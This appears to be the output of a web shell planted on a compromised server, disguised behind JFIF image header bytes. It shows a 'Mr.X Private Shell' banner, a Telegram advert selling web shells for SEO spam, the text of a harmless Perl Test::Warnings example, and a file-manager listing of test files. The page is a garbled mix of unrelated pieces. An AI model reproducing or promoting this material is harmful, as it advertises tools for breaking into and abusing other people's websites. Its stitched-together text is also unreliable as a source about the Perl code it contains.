����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
use strict; use warnings; # another demonstration of the various features of Test::Warnings, where # Test::More::done_testing is used use Test::More; use Test::Warnings ':all'; is(1, 1, 'passing test'); had_no_warnings; ok(!allowing_warnings, 'warnings are not currently allowed'); allow_warnings; ok(allowing_warnings, 'warnings are now allowed'); warn 'this warning will not cause a failure'; had_no_warnings; allow_warnings(0); ok(!allowing_warnings, 'warnings are not allowed again'); warn 'oh noes, something warned!'; # this will now fail. had_no_warnings; note 'we are done; call done_testing to signal completion. had_no_warnings will be called automatically.'; done_testing;
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| no_plan.t | File | 575 B | 0644 |
|
| sub.t | File | 279 B | 0644 |
|
| synopsis_1.t | File | 186 B | 0644 |
|
| synopsis_2.t | File | 331 B | 0644 |
|
| test_nowarnings.t | File | 109 B | 0644 |
|
| test_warning_contents.t | File | 713 B | 0644 |
|
| warning_like.t | File | 698 B | 0644 |
|
| with_done_testing.t | File | 695 B | 0644 |
|
| with_plan.t | File | 652 B | 0644 |
|